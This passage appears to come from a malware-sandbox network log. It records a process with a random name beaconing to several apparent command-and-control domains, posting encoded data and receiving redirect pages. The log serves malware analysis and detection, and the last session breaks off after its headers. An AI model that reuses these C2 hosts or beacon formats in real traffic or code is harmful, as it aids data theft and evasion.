vf5pwn=+O2xfQVLDeWjYEoe/rDXsqlfcfRv/p3zNiO5XX94gkEECxkCrYNctXobucivBwGZfCM6to1fTHFKT4UmCNeD+R0exYq2anzkqJOnp02F2/NzUePd2eZ9J58qNpuBFWtObkPOEJLPzn8cZJ+VAciIgW37+o0MUchQimuxD0zJsbUjxMNJrJM2WuxSJboye2RKn2eLTU3ZsetH88DHUE6kv3bzQvhYgNJzQXYgXLQtfjxRHXm3qrfAmw+Ks6Id1LOVjTGXNgVBoiXERPCXPYBn9kbv24NKQ2sOHUC+z9VcDHHIS36YMfsx1Ts2ZjquSkyIvMup82kmCv99HUx4rmeJxKD74P/WjABN6jXlCsLAcOqc25DGqisFAlfYe9s5FHJIl0vLOdgEn7Rta4MKxAcrQEvJQEcOk8hyrwBGdLJb+q2dEXxXqMJ1JQNG0R33TIZIblJbiHIG2nXv/nIVJy9Rj8f3IItf4nKXwVuNMPOj4CD2rhkX4zeSwWuUfm0bpZ4s4lDmr8G4e3U22Oy9NQcCm8sixcMZSZSl1h8Uyf6OTniMTjh6Z7Ef4YxY7UG0FzHBZgHt7eiPCVvxM9lcbTlyvh8KFBhR+Km51DYYSlPvhRFtAp9fxRdDoFlkKXdAL6DDHTu4tORGJUtj1N88yq8ZDiDXLPESQrf7XIcZYT5pMxo+EMJrkW9jjLLcO3sIeHTOFWo7A0PxIquTa4JCcTC8gvhtRkw4FZKNbZibFpH6n+v0FH1kUVW+DXMTgd0gEFgxjCNMn+CCONkJbyUMeTz3syHz8sfjZVynwUoR2hmsYDOTYK/gKArf+/veSSCxfGGrcM/I9wTbmh1xaH1VcHrxIFbJ0cxX4JLa7yVlg3YwN8O8PR6d231V1MGCaVU/4VOZOaoQmhJPPMomrNGrK200t9lpqlECgH2JzYVIKc5pBlbnr6JvyKfjcsCTo7wa7N9ZGAX27hh7sEAzSQgkzDCKwUhipNZXI4YHtXPvCgOLEx367 [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.549731103.248.137.209802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:23:44.758128881 CEST522OUTGET /5o7d/?vf5pwn=zMeRclQqEZ6cHEkv6r3h6rNdPeIv0NfXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGdsHlq0LOSSwDS14egmHnY5/1aPOe4+/4uS5IVfZSCCmkbAw==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.63582.photo
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.5497323.33.130.190802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:24:19.382091999 CEST790OUTPOST /kt2f/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.asiapartnars.online
                                              Origin: http://www.asiapartnars.online
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.asiapartnars.online/kt2f/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 36 6f 67 78 63 6c 52 71 43 74 78 53 33 42 6d 39 69 4d 2b 62 67 30 34 4a 63 4f 6f 76 6e 6a 54 44 50 35 6c 48 2b 66 77 48 55 52 68 67 38 55 4e 31 42 67 6e 6c 49 52 79 6e 66 4b 42 65 50 52 4b 49 38 32 62 4a 77 33 31 36 65 67 5a 67 7a 63 49 53 6f 65 51 44 5a 35 33 36 2b 35 66 30 51 73 68 32 4d 76 67 4f 75 41 30 4e 78 57 44 32 58 69 2f 59 70 79 49 30 34 32 71 54 31 37 2b 31 33 6a 4c 7a 33 31 49 46 53 4d 51 70 53 4b 51 37 6f 62 53 61 49 4a 42 56 36 67 48 52 2b 58 34 31 44 56 63 38 65 42 66 64 72 4f 65 32 32 57 57 2b 6c 47 6a 5a 6f 78 2f 77 42 70 4b 46 36 45 4a 39 52 49 4b 6b 4a 53 6e 6a 65 2f 63 3d
                                              Data Ascii: vf5pwn=6ogxclRqCtxS3Bm9iM+bg04JcOovnjTDP5lH+fwHURhg8UN1BgnlIRynfKBePRKI82bJw316egZgzcISoeQDZ536+5f0Qsh2MvgOuA0NxWD2Xi/YpyI042qT17+13jLz31IFSMQpSKQ7obSaIJBV6gHR+X41DVc8eBfdrOe22WW+lGjZox/wBpKF6EJ9RIKkJSnje/c=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.5497333.33.130.190802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:24:21.932420015 CEST810OUTPOST /kt2f/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.asiapartnars.online
                                              Origin: http://www.asiapartnars.online
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.asiapartnars.online/kt2f/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 36 6f 67 78 63 6c 52 71 43 74 78 53 6c 78 57 39 68 76 6d 62 78 6b 34 4b 53 75 6f 76 79 54 54 48 50 35 5a 48 2b 65 30 74 56 6a 31 67 2f 31 39 31 41 69 50 6c 45 78 79 6e 55 71 42 66 52 68 4b 58 38 32 6e 33 77 32 4a 36 65 67 4e 67 7a 65 51 53 6f 70 45 63 59 70 33 38 78 5a 65 79 65 4d 68 32 4d 76 67 4f 75 41 78 6f 78 56 7a 32 4c 43 50 59 72 51 67 37 32 57 71 51 32 37 2b 31 39 44 4c 33 33 31 4a 6f 53 4f 6b 58 53 50 4d 37 6f 66 57 61 5a 34 42 57 6a 51 48 58 36 58 35 69 4c 57 42 6d 57 79 6e 66 6f 4d 47 72 69 58 6d 65 6b 77 4f 7a 79 54 33 59 53 4a 6d 39 71 58 42 4b 41 34 72 4e 54 78 33 54 41 6f 4c 74 61 55 44 4a 34 45 62 6e 73 2f 79 65 36 61 58 66 55 70 44 2f
                                              Data Ascii: vf5pwn=6ogxclRqCtxSlxW9hvmbxk4KSuovyTTHP5ZH+e0tVj1g/191AiPlExynUqBfRhKX82n3w2J6egNgzeQSopEcYp38xZeyeMh2MvgOuAxoxVz2LCPYrQg72WqQ27+19DL331JoSOkXSPM7ofWaZ4BWjQHX6X5iLWBmWynfoMGriXmekwOzyT3YSJm9qXBKA4rNTx3TAoLtaUDJ4Ebns/ye6aXfUpD/


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.5497343.33.130.190802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:24:24.475020885 CEST1827OUTPOST /kt2f/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.asiapartnars.online
                                              Origin: http://www.asiapartnars.online
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.asiapartnars.online/kt2f/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 36 6f 67 78 63 6c 52 71 43 74 78 53 6c 78 57 39 68 76 6d 62 78 6b 34 4b 53 75 6f 76 79 54 54 48 50 35 5a 48 2b 65 30 74 56 6a 74 67 38 48 31 31 42 45 48 6c 46 78 79 6e 5a 4b 42 61 52 68 4c 4c 38 32 50 37 77 32 45 50 65 6b 39 67 79 2f 77 53 75 62 38 63 54 70 33 38 70 70 66 31 51 73 67 75 4d 72 46 4a 75 44 5a 6f 78 56 7a 32 4c 41 58 59 39 53 49 37 6d 6d 71 54 31 37 2f 36 33 6a 4c 50 33 30 74 57 53 4e 4a 69 54 37 41 37 70 2f 47 61 4b 71 35 57 38 67 48 56 39 58 35 71 4c 57 4d 34 57 79 72 31 6f 4e 6a 6a 69 51 53 65 6d 6c 54 62 67 41 43 4f 4d 49 53 61 76 56 5a 59 43 39 76 74 4f 33 7a 56 63 59 4c 4d 51 48 7a 6c 76 6a 7a 56 6f 64 6e 6d 75 4f 62 38 54 2b 2b 50 70 66 63 64 5a 43 68 7a 6c 74 63 2f 59 47 4d 74 2b 4f 6d 35 58 72 68 37 66 4c 42 42 73 4a 76 56 50 44 72 61 65 68 51 6a 49 33 45 74 34 77 39 4d 4a 4a 46 31 33 38 57 73 30 33 7a 5a 30 47 30 76 74 44 31 51 63 6e 51 63 74 54 42 7a 36 58 59 66 4e 53 37 7a 6f 44 51 4f 48 37 52 31 69 35 69 54 43 49 42 4d 6a 59 35 45 49 2b 49 5a 41 51 4b [TRUNCATED]
                                              Data Ascii: vf5pwn=6ogxclRqCtxSlxW9hvmbxk4KSuovyTTHP5ZH+e0tVjtg8H11BEHlFxynZKBaRhLL82P7w2EPek9gy/wSub8cTp38ppf1QsguMrFJuDZoxVz2LAXY9SI7mmqT17/63jLP30tWSNJiT7A7p/GaKq5W8gHV9X5qLWM4Wyr1oNjjiQSemlTbgACOMISavVZYC9vtO3zVcYLMQHzlvjzVodnmuOb8T++PpfcdZChzltc/YGMt+Om5Xrh7fLBBsJvVPDraehQjI3Et4w9MJJF138Ws03zZ0G0vtD1QcnQctTBz6XYfNS7zoDQOH7R1i5iTCIBMjY5EI+IZAQKi40hdQcHGi09DTEP58Qfxe+a8GwNMbONEbg57/R/tmI3/IkVEuk24QyVgNjg7aGtjeJr5oozQVRuWzy9VxOb2yu1u+N3T8GUHhCZP6/o7bzgH+ONUBO4Eor2b8Ib0caAEXgNTk1DvSHOYJLVsi2RVy6SemLLLNM6K2I/BLHzfRg3DpC2kC832vi4bSDY7vaZUbWqLqa3bJnv8TWwlPdJH2h99MCApdndEaYOPlS2gQ+zretGeLekMy8fJmH9XwGbQUSbcNk5dXZuxosgfs2yxbmfhhCQysRSE3o60cRfQKnrJsYmjUYEGJstkVzRhJECtupw88Rc3DAoQmv9j6f2sZ0dpTYboPRswbDlL6HY/xv8vZBpvV1mQo1vN6y+1IcIhvZ53LwR1S7bRrjD1PWo/C6ZBW+8NAtMTfc6KYAQ6mtOaq1ERW8wJKffYmfDYTBiF4VZeGFMptHFBobg7b/Aserl/CMjX+aUQJXaCSgThbkmomyqyvBHOourjguI7NI72+Jq8AUtPRzZH8CL73Sq2Z4rlOp05fIQVRRA3LXTRhKhzyfBLIt+5q7F9uGVc3NOScRMt7gw90Y4HtmyseN4EPTK1rvv2jasIqI0neMmPN04lxEE81JwGKGlUAXE4EMmOIJEYiy/k6575DVjxWSIq1mUsu2cgKikHX [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.5497353.33.130.190802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:24:27.024223089 CEST530OUTGET /kt2f/?vf5pwn=3qIRfQl/AKdo1myXluGCiikgEIMzjkfYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfHO+i2Ne6X81cG7kNzDpu31X3NSjbrBV+9ESn2I73xzu4qQ==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.asiapartnars.online
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 26, 2024 15:24:27.492445946 CEST416INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Thu, 26 Sep 2024 13:24:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 276
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 66 35 70 77 6e 3d 33 71 49 52 66 51 6c 2f 41 4b 64 6f 31 6d 79 58 6c 75 47 43 69 69 6b 67 45 49 4d 7a 6a 6b 66 59 5a 34 4e 6d 78 4a 6f 75 5a 44 73 74 38 6e 46 59 47 46 6d 66 4a 6a 7a 71 55 66 6b 36 56 45 6d 4c 38 31 76 35 6f 30 6c 46 5a 68 74 65 35 2b 67 44 78 2b 73 66 48 4f 2b 69 32 4e 65 36 58 38 31 63 47 37 6b 4e 7a 44 70 75 33 31 58 33 4e 53 6a 62 72 42 56 2b 39 45 53 6e 32 49 37 33 78 7a 75 34 71 51 3d 3d 26 6c 48 75 6c 3d 6e 66 51 54 71 4c 34 30 76 44 45 70 49 70 33 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vf5pwn=3qIRfQl/AKdo1myXluGCiikgEIMzjkfYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfHO+i2Ne6X81cG7kNzDpu31X3NSjbrBV+9ESn2I73xzu4qQ==&lHul=nfQTqL40vDEpIp30"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.5497363.33.130.190802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:24:32.550617933 CEST775OUTPOST /al6z/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.linkwave.cloud
                                              Origin: http://www.linkwave.cloud
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.linkwave.cloud/al6z/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 59 54 71 74 69 44 6f 6f 77 42 63 70 4d 33 56 70 65 76 4d 74 50 77 44 53 55 74 71 36 66 74 79 52 55 35 5a 54 33 78 31 50 44 4f 54 67 59 6a 62 59 65 2b 57 66 41 7a 58 33 56 50 56 79 4e 57 65 55 78 59 44 66 47 37 4c 77 7a 42 45 6c 61 61 2f 33 76 35 57 66 72 2b 67 42 62 63 54 31 4e 52 75 31 32 62 4a 57 6b 63 6e 33 46 47 51 70 77 64 79 67 67 6d 6e 75 6e 76 33 48 47 53 68 48 4b 32 77 49 67 49 5a 34 67 68 6b 55 52 57 4f 37 37 71 34 70 77 33 41 6b 4a 4c 66 33 71 61 42 36 34 6e 36 74 46 6a 52 72 4f 2f 49 62 59 37 6a 75 63 42 70 6d 55 2b 47 62 36 38 70 67 79 54 7a 35 34 76 65 2b 4e 41 62 64 77 6c 45 3d
                                              Data Ascii: vf5pwn=YTqtiDoowBcpM3VpevMtPwDSUtq6ftyRU5ZT3x1PDOTgYjbYe+WfAzX3VPVyNWeUxYDfG7LwzBElaa/3v5Wfr+gBbcT1NRu12bJWkcn3FGQpwdyggmnunv3HGShHK2wIgIZ4ghkURWO77q4pw3AkJLf3qaB64n6tFjRrO/IbY7jucBpmU+Gb68pgyTz54ve+NAbdwlE=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.5497373.33.130.190802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:24:35.102122068 CEST795OUTPOST /al6z/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.linkwave.cloud
                                              Origin: http://www.linkwave.cloud
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.linkwave.cloud/al6z/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 59 54 71 74 69 44 6f 6f 77 42 63 70 4d 57 6c 70 63 4d 30 74 65 41 44 54 58 74 71 36 52 4e 79 56 55 35 46 54 33 77 42 68 44 38 33 67 59 47 2f 59 52 63 75 66 44 7a 58 33 41 2f 56 33 54 6d 65 62 78 59 66 39 47 36 6e 77 7a 42 67 6c 61 65 7a 33 6f 49 57 63 74 2b 67 50 64 63 54 33 4a 52 75 31 32 62 4a 57 6b 59 32 51 46 47 49 70 77 73 43 67 68 45 50 74 37 2f 33 41 53 43 68 48 62 6d 77 4d 67 49 59 62 67 6c 6c 63 52 55 32 37 37 71 49 70 77 6d 41 6e 41 4c 66 78 6c 36 41 30 78 6d 72 37 4e 6a 46 79 42 75 70 7a 48 35 6e 31 55 58 45 4d 4f 63 4f 7a 70 63 46 59 69 41 37 4f 70 66 2f 58 58 6a 4c 74 75 79 54 33 77 47 56 57 44 54 68 52 72 72 63 4d 53 36 50 77 72 45 66 6b
                                              Data Ascii: vf5pwn=YTqtiDoowBcpMWlpcM0teADTXtq6RNyVU5FT3wBhD83gYG/YRcufDzX3A/V3TmebxYf9G6nwzBglaez3oIWct+gPdcT3JRu12bJWkY2QFGIpwsCghEPt7/3ASChHbmwMgIYbgllcRU277qIpwmAnALfxl6A0xmr7NjFyBupzH5n1UXEMOcOzpcFYiA7Opf/XXjLtuyT3wGVWDThRrrcMS6PwrEfk


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.5497383.33.130.190802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:24:37.648211002 CEST1812OUTPOST /al6z/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.linkwave.cloud
                                              Origin: http://www.linkwave.cloud
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.linkwave.cloud/al6z/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 59 54 71 74 69 44 6f 6f 77 42 63 70 4d 57 6c 70 63 4d 30 74 65 41 44 54 58 74 71 36 52 4e 79 56 55 35 46 54 33 77 42 68 44 38 2f 67 59 77 7a 59 51 37 36 66 43 7a 58 33 63 76 56 32 54 6d 65 38 78 59 58 35 47 36 36 4e 7a 44 49 6c 61 37 76 33 70 36 75 63 34 4f 67 50 66 63 54 30 4e 52 75 61 32 59 68 53 6b 63 53 51 46 47 49 70 77 76 71 67 6b 6d 6e 74 35 2f 33 48 47 53 68 31 4b 32 77 6b 67 49 42 67 67 6c 68 4d 51 6c 57 37 37 4b 59 70 7a 55 59 6e 63 62 66 7a 78 61 42 70 78 6d 6d 6c 4e 69 70 2b 42 75 4d 59 48 37 33 31 46 47 6c 4b 4b 39 4b 49 7a 71 46 66 79 48 7a 59 78 6f 36 31 66 55 6e 70 69 68 7a 49 34 6c 39 66 4d 46 49 63 2f 2f 67 49 42 2b 6e 72 6b 53 75 4a 61 6d 55 6b 30 6c 4a 4c 53 67 54 33 47 59 7a 71 4c 4d 41 55 72 64 4a 7a 34 72 38 59 71 6d 31 32 70 56 4c 41 43 44 76 6f 56 6b 31 7a 66 30 45 67 2f 70 58 78 48 79 41 43 59 69 4c 65 75 42 32 4f 4d 79 6c 6c 73 32 2b 57 55 75 77 52 68 59 74 62 4d 69 35 6d 6f 30 48 74 49 31 37 75 58 54 56 67 73 2f 49 35 64 63 75 7a 66 53 57 4e 54 2f 4e [TRUNCATED]
                                              Data Ascii: vf5pwn=YTqtiDoowBcpMWlpcM0teADTXtq6RNyVU5FT3wBhD8/gYwzYQ76fCzX3cvV2Tme8xYX5G66NzDIla7v3p6uc4OgPfcT0NRua2YhSkcSQFGIpwvqgkmnt5/3HGSh1K2wkgIBgglhMQlW77KYpzUYncbfzxaBpxmmlNip+BuMYH731FGlKK9KIzqFfyHzYxo61fUnpihzI4l9fMFIc//gIB+nrkSuJamUk0lJLSgT3GYzqLMAUrdJz4r8Yqm12pVLACDvoVk1zf0Eg/pXxHyACYiLeuB2OMylls2+WUuwRhYtbMi5mo0HtI17uXTVgs/I5dcuzfSWNT/NNuDMMoVMLcrwC5XhCIPon0rDIqwVTadhl5OHQ2SfxevCMl20e9eGYgndSvsrQcTAnIKIg2XyX7rVhGRChLG362Fc8m/i1mk3BBpTSLSf+UhD89pt4a6HuFA9ZUIMYTG/y9UvtqvZRq9wtoEaS/RWqvDUTg1WJDdOh4TV2G+nYSBe+8akrsvzMwrvtNu5QbDik9+Qn3LC0kqixZpLMA6HqIEQhuUvmzLECABwDVsDvt5WpnIJqBbB8Q7C1c4RPq6sNN4qV6TeXxIgaQDIpejimcFwSdwXtSf/4d/r2JT7Na8q96SJ8wBXguZckybjY5bZQ1xBvMYRMA55CWyDMIvjlFgwGvdqhc/FcRGwcbZ9RcaIVYX9EYfz6wW5DL66OpLX+lRw1Uv8/oLlccDdHZDZCv25QGNmpTLcpiLoM8mQ7tDPYNE4JawUtB/lE0AhKn3C7A8LO21k1mRevRNZICjSbxe4EaMLcQqosVb4CDnWZAoqomq6R8KqkVn9dcoZviHXIziTYhns1lqvgA8ZrhCpWu6VtL2WrIQcQWuFJI/4Cv0XjLLl/oAwevbrJhBN+Lu3JhvSmNknZ+SNN5DcTxX2irmkTO+QqVG5BcvokE/TsxaSbeKknOk+R1kKQ9NfBavINIOoy0FIrucWPRF92CVI0blok3GGFj567N [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.5497393.33.130.190802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:24:40.196541071 CEST525OUTGET /al6z/?lHul=nfQTqL40vDEpIp30&vf5pwn=VRCNh0NW0GgzXjJ+E9kBcAqzCeGDRYuLK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cpu7tsWuW3JQaVwptT6evyL2oGhO/bgF+68v7eWhteCSlc6A== HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.linkwave.cloud
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 26, 2024 15:24:40.651166916 CEST416INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Thu, 26 Sep 2024 13:24:40 GMT
                                              Content-Type: text/html
                                              Content-Length: 276
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6c 48 75 6c 3d 6e 66 51 54 71 4c 34 30 76 44 45 70 49 70 33 30 26 76 66 35 70 77 6e 3d 56 52 43 4e 68 30 4e 57 30 47 67 7a 58 6a 4a 2b 45 39 6b 42 63 41 71 7a 43 65 47 44 52 59 75 4c 4b 36 67 69 2f 33 31 4f 49 2f 48 4c 56 7a 33 65 64 4c 4f 46 50 67 66 42 57 49 49 46 49 31 79 76 34 4b 6e 48 64 5a 2f 42 79 43 41 64 52 72 4f 77 32 39 43 70 75 37 74 73 57 75 57 33 4a 51 61 56 77 70 74 54 36 65 76 79 4c 32 6f 47 68 4f 2f 62 67 46 2b 36 38 76 37 65 57 68 74 65 43 53 6c 63 36 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lHul=nfQTqL40vDEpIp30&vf5pwn=VRCNh0NW0GgzXjJ+E9kBcAqzCeGDRYuLK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cpu7tsWuW3JQaVwptT6evyL2oGhO/bgF+68v7eWhteCSlc6A=="}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.54974085.153.138.113802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:24:45.915941954 CEST769OUTPOST /3lu7/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mfgarage.net
                                              Origin: http://www.mfgarage.net
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mfgarage.net/3lu7/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
